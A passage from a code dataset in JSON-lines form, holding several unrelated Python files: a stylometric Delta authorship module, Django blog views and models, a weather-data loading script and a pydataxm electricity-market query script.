tag).\n # We check if the first argument is a real word in the\n # sense that it contains at least one alphabetic character (a-zA-Z)\n # such that words like \"middle-age\" or \"I'll\" are accepted.\n self.counter = Counter({k: v for k,v in dict(self.counter).items() \\\n if sum(c in string.ascii_letters for c in k[0]) > 0 })\n \n # Restrict the number of words used for the calculations\n if self.considered_words > 0:\n n = self.considered_words\n # The following code takes the n most_common words\n # in the database (this yields a list of tuples) \n # and converts it to a dictionary and then again \n # to a counter.\n self.counter = Counter(dict(self.counter.most_common(n)))\n \n \n def calc_mean_stdev(self):\n \"\"\"\n Calculate the mean frequencies and standard deviation \n of every word in the database. \n calc_counter has to be executed before.\n \"\"\"\n \n logging.info(\"Database: Calculating mean and stdev.\")\n for word in self.counter:\n word_scores = []\n for author in self.authors:\n for text in author.texts:\n if word in text.scores:\n word_scores.append(text.scores[word])\n else: # word is *not* in text.scores, \n # i.e. score (frequency) = 0\n word_scores.append(0)\n \n self.mean[word] = mean(word_scores)\n try:\n self.stdev[word] = stdev(word_scores,self.mean[word])\n except StatisticsError:\n # could happen if a word occurs only in one text\n logging.debug(\n \"Database: Calculating mean and stdev: StatisticsError\")\n self.stdev[word] = 0 \n \n def process(self):\n \"\"\"\n Process the Database, i.e. count all words and determine \n their mean frequencies and standard deviation with respect \n to all texts.\n \"\"\"\n self.calc_counter()\n self.calc_mean_stdev()\n \n \n \n \nclass Author:\n \"\"\"Represents an author with a collection of his texts.\"\"\"\n \n def __init__(self,name):\n self.name = name # the author's name\n self.texts = [] # a list of the author's text\n self.counter = Counter() # a counter of all words of the author\n \n # The following two dictionaries contain\n # the mean frequencies and their standard\n # deviation with respect to the set of all\n # texts of this author.\n self.mean = {} \n self.stdev = {}\n \n self.txt_number = 0 # the number of texts of this author\n \n # The following dictionary contains the\n # zscores of this author's words again\n # with respect to the set of all texts of\n # this author\n self.zscores = {}\n \n # Has the counter already been calculated?\n self.__counter_calculated = False\n \n def add_text(self,*texts):\n \"\"\"Add texts to this author.\"\"\"\n for text in texts:\n self.texts.append(text)\n self.txt_number += 1\n \n def calc_counter(self):\n \"\"\"Count the occurrences of every word in texts of this author.\"\"\"\n \n if not self.__counter_calculated:\n logging.info(\"Author '%s': Calculating Counter.\",self.name)\n for text in self.texts:\n self.counter += text.counter\n self.__counter_calculated = True\n else:\n logging.info(\"Author '%s': Counter has already been calculated.\",\n self.name)\n \n \n def calc_mean_stdev(self):\n \"\"\"\n Calculate the mean frequencies and standard deviation of every word.\n calc_counter has to be executed before\n \"\"\" \n logging.info(\"Author '%s': Calculating mean and stdev.\",self.name)\n for word in self.counter:\n word_scores = []\n for text in self.texts:\n if word in text.scores:\n word_scores.append(text.scores[word])\n else:\n # word is *not* in text, i.e. score (frequency) is 0!\n word_scores.append(0)\n \n \n self.mean[word] = mean(word_scores)\n try:\n self.stdev[word] = stdev(word_scores,self.mean[word])\n except StatisticsError:\n # This happens, for example, if the author has only one text\n logging.debug(\"Author '%s': Calculating mean\" + \n \"and stdev: StatisticsError\", self.name)\n self.stdev[word] = 0\n \n def calc_zscores(self, database):\n \"\"\"\n Calculate the zscores of this author's words with respect\n to the specified database. These are standardized variables (i.e.\n they have an expected value of 0 and a variance of 1).\n calc_mean_stdev has to be executed before\n \"\"\"\n for word in self.counter:\n # We have to check if the word is in the database's counter because\n # the database's might be restricted, e.g. most common words or \n # only real words. (see the comments of Database.calc_counter())\n if word in database.counter: \n if database.stdev[word] != 0:\n self.zscores[word] = (self.mean[word] - database.mean[word]) \\\n / database.stdev[word]\n else:\n self.zscores[word] = 0\n \n def calc_cmsz(self, database):\n \"\"\"\n Calculate counter, mean, standard deviation and zscores of\n this author with respect to the specified database\n \"\"\"\n self.calc_counter()\n self.calc_mean_stdev()\n self.calc_zscores(database)\n \n \n \n \nclass Text:\n \"\"\"Represents a single text.\"\"\"\n \n def __init__(self,raw,name,process=True,pos_tag=True):\n \"\"\"\n Initialize a text object with raw text.\n \n Keyword arguments:\n raw -- Raw text as a string.\n name -- Name of the text.\n process -- If true then directly process the text. (default: True)\n pos_tag -- Should the raw text be POS tagged? (default: True)\n \"\"\"\n self.name = name\n self.raw = raw\n self.tokens = []\n self.tags = []\n self.counter = Counter()\n self.scores = {}\n self.zscores = {}\n self.sum = 0 #number of words in self.raw\n \n if process:\n self.process(pos_tag=pos_tag)\n \n \n def process(self, pos_tag=True):\n \"\"\"\n Process the text at hand, i.e. it is tokenized, tagged and \n counted. Moreover, we calculate the frequency/score of every word\n (relative frequency).\n \n Keyword arguments:\n pos_tag -- Should the raw text be POS tagged? (default: True) \n \"\"\"\n if pos_tag:\n # A list of all tokens can be seen \n # with nltk.help.upenn_tagset()\n logging.info(\"Tokenizing '%s'\",self.name)\n self.tokens = nltk.word_tokenize(self.raw) \n logging.info(\"Tagging '%s'\",self.name)\n self.tags = nltk.pos_tag(self.tokens)\n else:\n logging.info(\"Preparing '%s'\", self.name)\n # the following takes all alphabetic words normalized to lowercase\n # from the raw data\n self.tags = [x for x in \n [''.join(c for c in word if c.isalpha()).lower() \n for word in self.raw.split()] \n if x != '']\n \n \n logging.info(\"Counting '%s'\", self.name)\n self.counter = Counter(self.tags)\n self.sum = sum(self.counter.values())\n \n logging.info(\"Calculating the scores of '%s'\", self.name)\n for x in self.counter:\n self.scores[x] = self.counter[x]/self.sum\n \n def calc_zscores(self, database):\n \"\"\"\n Calculate the z-scores with respect to the specified database. These are \n standardized variables (i.e. they have an expected value of 0 and \n a variance of 1).\n process has to be executed before.\n \"\"\"\n logging.info(\"Calculating the zscores of '%s'\",self.name)\n \n # Here we have a problem if there's a word in the\n # database whose standard deviation is 0. But this \n # should only happen if there is only one text in \n # the database or the word has the same frequency \n # in every text. For the moment, this shouldn't be \n # a problem.\n \n for word in database.counter:\n if word in self.counter:\n self.zscores[word] = (self.scores[word] \\\n - database.mean[word]) / database.stdev[word]\n \n \n def calc_delta(self, database, author):\n \"\"\"\n Calculate the delta for this text and the given author. \n Specify a database and an author from this database.\n calc_zscores has to be executed before\n \"\"\"\n logging.info(\"Text '%s': Calculating delta for author '%s'.\",\n self.name,author.name)\n absolute_differences = {}\n absolute_differences_sum = 0\n for word in database.counter:\n if word in self.counter:\n if word in author.zscores:\n absolute_differences[word] = abs(\n self.zscores[word] - author.zscores[word] )\n else:\n absolute_differences[word] = abs(self.zscores[word])\n absolute_differences_sum += absolute_differences[word]\n return absolute_differences_sum # / sum(self.counter.values())", "sub_path": "delta.py", "file_name": "delta.py", "file_ext": "py", "file_size_in_byte": 13078, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 83, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 84, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 103, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 116, "usage_type": "call"}, {"api_name": "statistics.StatisticsError", "line_number": 117, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 119, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 176, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 185, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 198, "usage_type": "call"}, {"api_name": "statistics.StatisticsError", "line_number": 199, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 201, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 252, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 273, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 274, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 275, "usage_type": "call"}, {"api_name": "nltk.pos_tag", "line_number": 276, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 278, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 287, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 291, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 323, "usage_type": "call"}]} +{"seq_id": "329128029", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\n# Create your views here.\nfrom .models import Post, Category, Tag, User\nfrom django.db.models import Q\n# from markdown import markdown,Markdown\n# from markdown.extensions.toc import TocExtension\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nimport markdown\nfrom django.views.generic import ListView, DetailView\nfrom comments.forms import CommentForm\n\n\n# 第一次测试用视图函数\ndef index_back(request):\n return render(request, 'boardapp/index.html', context={\n 'title': '我的公告板首页',\n 'welcome': '欢迎访问我的公告板首页'\n })\n # return HttpResponse(\"欢迎来到我的主页\")\n\n\n# def index(request):\n# post_list = Post.objects.all().order_by('created_time')\n# return render(request,'boardapp/index.html',context={'post_list':post_list})\ndef fullwith(request):\n return render(request, 'fullwidth.html')\n # return HttpResponse('

hello world

')\n\n\ndef contact(request):\n return render(request, 'contact.html')\n\n\ndef regards(request):\n return render(request, 'regards.html')\n\n\nclass IndexView(ListView):\n model = Post\n template_name = 'boardapp/index.html'\n context_object_name = 'post_list'\n paginate_by = 2\n\n def pagination_data(self, paginator, page, is_paginated):\n if not is_paginated:\n return {}\n # 设置默认值\n # 1、first是首页\n first = False\n # \\2、省略号\n left_has_more = False\n # \\3、当前页左边的几个页码\n left = []\n # 4、当前页的页码\n page_number = page.number\n # \\5、当前页右边的几个页码\n right = []\n # \\6、省略号\n right_has_more = False\n # \\7、last是最后一页\n last = False\n\n # 总页数\n total_pages = paginator.num_pages\n\n # 获取整个分页页码列表。例如共有10页时,page_range:[1,2,3,4,5,6,7,8,9,10]\n page_range = paginator.page_range\n\n # 如果当前是第1页\n if page_number == 1:\n right = page_range[page_number:page_number + 1]\n if right[-1] < total_pages - 1:\n right_has_more = True\n if right[-1] < total_pages:\n last = True\n elif page_number == total_pages: # 如果当前是最后一页\n left = page_range[(page_number - 2) if (page_number - 2) > 0 else 0:page_number - 1]\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n else:\n left = page_range[(page_number - 2) if (page_number - 2) > 0 else 0:page_number - 1]\n right = page_range[page_number:page_number + 1]\n if right[-1] < total_pages - 1:\n right_has_more = True\n if right[-1] < total_pages:\n last = True\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n data = {\n 'left': left,\n 'right': right,\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'first': first,\n 'last': last,\n }\n\n return data\n\n def get_context_data(self, **kwargs):\n # 首先获得基类get_context_data()返回的context\n context = super().get_context_data(**kwargs)\n paginator = context.get('paginator')\n page = context.get('page_obj')\n is_paginated = context.get('is_paginated')\n\n pagination_data = self.pagination_data(paginator, page, is_paginated)\n context.update(pagination_data)\n print(context)\n return context\n\n\ndef detail(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n post.increase_views()\n # print('ssssssssssssssssssssssssssss')\n # print(request.user.username)\n # user = get_object_or_404(User,username = request.user.username)\n # print(user.__dict__)\n post.body = markdown.markdown(post.body, extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc', ])\n form = CommentForm()\n comment_list = post.comment_set.all()\n context = {'post': post,\n 'form': form,\n 'comment_list': comment_list}\n return render(request, 'boardapp/detail.html', context=context)\n\n\ndef archives(request, year, month):\n post_list = Post.objects.filter(created_time__year=year,\n created_time__month=month).order_by('-created_time')\n return render(request, 'boardapp/index.html', context={\"post_list\": post_list})\n\n\ndef category(request, pk):\n cate = get_object_or_404(Category, pk=pk)\n post_list = Post.objects.filter(category=cate).order_by('-created_time')\n return render(request, 'boardapp/index.html', context={'post_list': post_list})\n\n\ndef tags(request, pk):\n cate = get_object_or_404(Tag, pk=pk)\n post_list = Post.objects.filter(tags=cate).order_by('-created_time')\n print(post_list)\n return render(request, 'boardapp/index.html', context={'post_list': post_list})\n\n\ndef search(request):\n q = request.GET.get('q')\n error_msg = \"\"\n if not q:\n error_msg = \"请输入要查找的信息\"\n return render(request, 'boardapp/index.html', {'error_msg': error_msg})\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body_icontains=q))\n return render(request, 'boardapp/index.html', {'error_msg': error_msg, 'post_list': post_list})\n", "sub_path": "board/boardapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5664, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 120, "usage_type": "argument"}, {"api_name": "markdown.markdown", "line_number": 126, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 135, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 145, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 145, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Tag", "line_number": 151, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 152, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 163, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 163, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "233172313", "text": "from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom jsonfield import JSONField\n\nUser = get_user_model()\n\n\nclass Team(models.Model):\n name = models.CharField(max_length=64, unique=True)\n # description = models.TextField(max_length=1024)\n # logo = models.ImageField()\n\n members = models.ManyToManyField(User)\n owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"teamowner\")\n date_added = models.DateTimeField(auto_now_add=True)\n\n\nclass Star(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name=\"team\")\n date_added = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\"user\", \"team\")\n\n\nclass FunctionItem(models.Model):\n team = models.ForeignKey(\n Team,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"functionitems\",\n )\n\n name = models.TextField(max_length=200)\n data = JSONField(max_length=800)\n\n date_added = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n # class Meta:\n # unique_together = (\"name\", \"team\")\n\n def __str__(self):\n return \"%s: %s\" % (self.name, self.data)\n\n\nclass WebSite(models.Model):\n\n url = models.URLField()\n name = models.CharField(max_length=200)\n team = models.ForeignKey(\n Team, blank=True, null=True, on_delete=models.CASCADE, related_name=\"websites\"\n )\n date_added = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s (%s)\" % (self.url, self.name)\n\n", "sub_path": "zhi/zhiteam/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 5, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "jsonfield.JSONField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 56, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "293520547", "text": "from meteo.models import MeteoValue\nimport datetime\nimport pytz\ntz = pytz.timezone(\"Europe/Paris\")\n\n\ndef check():\n\tdata = MeteoValue.objects.all()\n\ti = 0\n\tfor sset in data:\n\t\ti += 1\n\t\tprint(str(type(sset.date)) + \" \" + str(sset.date) + \" \" + str(sset.date.astimezone(tz)))\n\t\tif i > 10:\n\t\t\tbreak\n\n\ndef pop():\n\tMeteoValue.objects.all().delete()\n\tf = open(\"data.log\")\n\tlines = f.readlines()\n\tf.close()\n\ti = 0\n\tstart = 0\n\tfor line in lines:\n\t\ti += 1\n\t\tline = line.strip()\n\t\tif len(line) == 0:\n\t\t\tcontinue\n\t\tif line.startswith(\"date\"):\n\t\t\tcontinue\n\t\tif line.startswith(\"id\"):\n\t\t\tstart = 1\n\t\t\tcontinue\n\t\titems = line.split()\n\t\tdatentime = items[start] + \" \" + items[start + 1]\n\t\tdt = datetime.datetime.strptime(datentime, \"%Y-%m-%d %H:%M:%S\")\n\t\tdtt = dt.astimezone(tz)\n\t\tm = MeteoValue(date=dtt, server_room_temperature=float(items[start + 2]), server_room_humidity=float(items[start + 3]))\n\t\tm.save()\n\t\t#if i >= 100:\n\t\t#\tbreak\n\n\nif __name__ == \"__main__\":\n\tpop()\n", "sub_path": "old/www/www/populate.py", "file_name": "populate.py", "file_ext": "py", "file_size_in_byte": 958, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytz.timezone", "line_number": 4, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "meteo.models.MeteoValue", "line_number": 8, "usage_type": "name"}, {"api_name": "meteo.models.MeteoValue.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "meteo.models.MeteoValue", "line_number": 18, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "meteo.models.MeteoValue", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "604522588", "text": "from pydataxm import ReadDB\nimport pandas as pd\nimport datetime as dt\n\ninven_met = {'Recursos': {'freq': ['Horaria', 'Diaria'],\n 'Horaria': {'var': {'Generacion Ideal': ['GeneIdea', 1],\n 'Generacion Real': ['Gene', 1],\n 'Consumo Combustible Aprox. Factor de Emisión': ['ConsCombustibleMBTU', 0],\n 'Precio de Oferta del Despacho': ['PrecOferDesp', 0],\n 'Emisiones CO2e': ['EmisionesCO2Eq', 0],\n 'Generación Seguridad': ['GeneSeguridad', 0],\n 'Generación Fuera de Merito': ['GeneFueraMerito', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n },\n 'Diaria': {'var': {'Obligaciones de Energía Firme':['ObligEnerFirme', 0]},\n 'join_var':['Id', 'Code', 'Date']\n }\n },\n\n 'Recursos_Combinados': {'freq': ['Horaria'],\n 'Horaria': {'var': {'Consumo Comb Aprox.': ['ConsCombAprox', 0],\n 'Emisiones CO2': ['EmisionesCO2', 0],\n 'Emisiones CH4': ['EmisionesCH4', 0],\n 'Emisiones N2O': ['EmisionesN2O', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Values_Name', 'Date', 'Hour']\n }\n },\n\n 'Agentes': {'freq':['Horaria'],\n 'Horaria': {'var': {'Demanda Comercial': ['DemaCome', 1],\n 'Ventas en Contratos Energía': ['VentContEner', 1],\n 'Compras en Contratos Energía': ['CompContEner', 1],\n 'Compras en Bolsa Nacional Energía': ['CompBolsNaciEner', 1],\n 'Demanda por Operador de Red': ['DemaOR', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n }\n },\n\n 'Sistema': {'freq': ['Horaria', 'Diaria', 'Anual'],\n 'Horaria': {'var': {'Generacion Ideal': ['GeneIdea', 0],\n 'Generacion Real': ['Gene', 0],\n 'Demanda Comercial': ['DemaCome', 0],\n 'Precio de Bolsa Nacional': ['PrecBolsNaci', 0],\n 'Máximo Precio de Oferta Nacional': ['MaxPrecOferNal', 0],\n 'Restricciones Aliviadas': ['RestAliv', 0],\n 'Ventas en Contratos Energía': ['VentContEner', 0],\n 'Compras en Contratos Energía': ['CompContEner', 0],\n 'Compras en Bolsa Nacional Energía': ['CompBolsNaciEner', 0],\n 'factor emision CO2e': ['factorEmisionCO2e', 0],\n 'Importaciones Energía': ['ImpoEner', 0],\n 'Perdidas en Energia': ['PerdidasEner', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n },\n 'Diaria': {'var': {'Aportes Energia': ['AporEner', 0],\n 'Precio de Escasez de Activacion': ['PrecEscaAct', 0],\n 'Remuneración Real Ind. Cargo Confiabilidad': ['RemuRealIndiv', 0],\n 'Precio Promedio Contratos Regulado': ['PrecPromContRegu', 0],\n 'Precio Promedio Contratos NO Regulado': ['PrecPromContNoRegu', 0],\n 'Volumen Util Diario en Energia': ['VoluUtilDiarEner', 0],\n 'Demanda del SIN': ['DemaSIN', 0],\n 'Capacidad Util Diaria en Energia': ['CapaUtilDiarEner', 0],\n 'Media Historica Aportes': ['AporEnerMediHist', 0],\n 'FAZNI': ['FAZNI', 0],\n 'PRONE': ['PRONE', 0],\n 'FAER': ['FAER', 0]\n },\n 'join_var': ['Id', 'Date']\n },\n 'Anual': {'var': {'Listado de recursos térmicos CEN por mes':['CapEfecNeta', 0]},\n 'join_var': []\n }\n },\n\n\n 'Rios': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Aportes Energia': ['AporEner', 1],\n 'Media Historica Aportes': ['AporEnerMediHist', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n 'Embalses': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Volumen Util Diario en Energia': ['VoluUtilDiarEner', 1],\n 'Capacidad Util Diaria en Energia': ['CapaUtilDiarEner', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n\n 'Areas': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Demanda No Atendida Programada por Área': ['DemaNoAtenProg', 0],\n 'Demanda No Atendida No Programada por Área': ['DemaNoAtenNoProg', 0]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n 'Subareas': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Demanda No Atendida Programada por Subarea': ['DemaNoAtenProg', 1],\n 'Demanda No Atendida No Programada por Subarea': ['DemaNoAtenNoProg', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n }\n\n }\n\n\n\ninstances = {'Recursos': {'Id': 'id', 'Values_Value1': 'tipo_despacho',\n 'Values_Value2': 'tecnologia', 'Values_Value3': 'categoria',\n 'Values_code':'submercado', 'datetime': 'fecha_hora',\n 'Values_Name': 'Combustible', 'Values_code':'sub_mercado', 'Date': 'fecha'\n },\n 'Recursos_Combinados':{'Id': 'id', 'Values_Name':'sub_mercado', 'Values_code': 'Combustible'},\n 'Agentes': {'Id': 'id', 'Values_code':'submercado', 'datetime': 'fecha_hora'},\n 'Sistema': {'Id': 'id', 'datetime': 'fecha_hora', 'Date': 'fecha'},\n 'Rios': {'Id': 'id', 'Name': 'nombre','Date': 'fecha'},\n 'Embalses': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'},\n 'Areas': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'},\n 'Subareas': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'}\n }\n\ntiempos = {'Values_Hour01': '00:00:00', 'Values_Hour02': '00:01:00',\n 'Values_Hour03': '00:02:00', 'Values_Hour04': '00:03:00',\n 'Values_Hour05': '00:04:00', 'Values_Hour06': '00:05:00',\n 'Values_Hour07': '00:06:00', 'Values_Hour08': '00:07:00',\n 'Values_Hour09': '00:08:00', 'Values_Hour10': '00:09:00',\n 'Values_Hour11': '00:10:00', 'Values_Hour12': '00:11:00',\n 'Values_Hour13': '00:12:00', 'Values_Hour14': '00:13:00',\n 'Values_Hour15': '00:14:00', 'Values_Hour16': '00:15:00',\n 'Values_Hour17': '00:16:00', 'Values_Hour18': '00:17:00',\n 'Values_Hour19': '00:18:00', 'Values_Hour20': '00:19:00',\n 'Values_Hour21': '00:20:00', 'Values_Hour22': '00:21:00',\n 'Values_Hour23': '00:22:00', 'Values_Hour24': '00:23:00'\n }\n\n\n\n\ndef queryToTable(var, index, sd, ed, freq):\n\n query = ReadDB() # Conect with the API\n d = query.request_data(var, index, sd, ed) # Do QUERY\n if len(d.columns) == 0: # Notify if a QUERY does not generate data\n print(f'No existen datos de {var} para estas fechas')\n else: # If QUERY generate data\n # Verify frequency\n if freq == 'Horaria':\n value_vars = list(d.loc[:, 'Values_Hour01':'Values_Hour24'])\n id_vars =[x for x in d.columns if x not in value_vars]\n d = d.melt(id_vars=id_vars, value_vars=value_vars,\n var_name='Hour', value_name=var)\n d[var] = pd.to_numeric(d[var])\n\n if freq == 'Diaria':\n d = query.request_data(var, index, sd, ed)\n d[var] = pd.to_numeric(d['Value'])\n d = d.drop(['Value'], axis=1)\n\n return 